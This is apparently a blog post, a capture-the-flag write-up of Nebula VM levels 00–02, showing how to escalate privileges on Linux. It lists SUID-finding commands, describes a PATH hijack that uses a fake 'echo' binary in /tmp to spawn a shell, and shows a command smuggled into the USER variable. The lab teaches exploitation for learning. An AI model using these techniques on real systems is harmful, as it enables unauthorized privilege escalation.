Open in app

Sign in

Write

Sign in

Day 29: Set User ID & Environment Variable Injection (PATH & USER) for Linux Priv. Esc.

Atumcell Labs
2 min readJan 28, 2019

To follow along, get the Nebula VM from Exploit Education…

Exploit Education :: Andrew Griffiths' Exploit Education

exploit.education provides a variety of resources that can be used to learn about vulnerability analysis, exploit…

exploit.education

Level 00 (Set User ID)

Finding the files and ignoring errors…

find / -perm /4000 2>/dev/null

A lot of these are common linux files that are Set User ID so over time you get to know them and ignore them, unless your in a CTF that is trolling you and the issue is in a common bin, so always check anyway if it’s at a dead end or an old version that has known vulnerabilities.

Of course “/bin/…/flag00” is seriously suspect, so we try this…

level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!flag00@nebula:~$ getflag
You have successfully executed getflag on a target account

It really was that easy but do not underestimate the power of Set User ID, it has allowed me to priv. esc. more times than I can recall, it’s powerfull, it’s common, use it! Always check permissions!

Search for SUID/GUID binaries

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 6 -exec ls -ld {} \; 2>/dev/nullfind / -perm -1000 -type d 2>/dev/nullfind / -perm -g=s -type f 2>/dev/null

Nebula Level00

Recorded by int0x33

asciinema.org

Level 01 (Environment Variable Injection — PATH)

Challenge source is provided, can we spot the vulnerability?

We know we can alter environment variables and that the program will do the following:

setresuid() which sets the real user ID, the effective user ID, and the saved set-user-ID of the calling process and setresgid() which sets the real GID, effective GID, and saved set-group-ID of the calling process.

With the source code, and access to the server, it’s easy to spot the issue:

-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01

If we can change our executable $PATH to first check /tmp a place we know we can write to, then we can put our own ‘echo’ binary there which will allow us to call a system process as flag01. Out echo program will simply spawn a new shell.

nano /tmp/echo.c
cc /tmp/echo.c -o /tmp/echo
export PATH=/tmp/:$PATH
cd /home/flag01
./flag01
getflag

Nebula - Level01

Recorded by int0x33

asciinema.org

Level 02 (Environment Variable Injection — USER)

We get the source again for this..

This one is easy, we can just inject a command into the USER environment variable.

cd /home/flag02
USER=";/bin/sh;"
./flag02
getflag

The 2x semi-colons in the “/bin/sh” command injection are important as bash needs that to separate the commands otherwise it will look for “echo /bin/sh is cool” which of course is junk for us.

Nebula - level 02

Recorded by int0x33

asciinema.org

Sign up to discover human stories that deepen your understanding of the world.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Linux
Cybersecurity
Infosec
Hacking
Programming

Atumcell Labs
Atumcell Labs

Written by Atumcell Labs

2.4K Followers
3 Following

Security Research Team @ Atumcell

No responses yet

Write a response

What are your thoughts?

More from Atumcell Labs

See all from Atumcell Labs

Recommended from Medium

Lists

General Coding Knowledge

20 stories1933 saves

Coding & Development

11 stories1022 saves

Stories to Help You Grow as a Software Developer

19 stories1615 saves
AI-generated image of a cute tiny robot in the backdrop of ChatGPT’s logo

ChatGPT

21 stories982 saves
See more recommendations

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams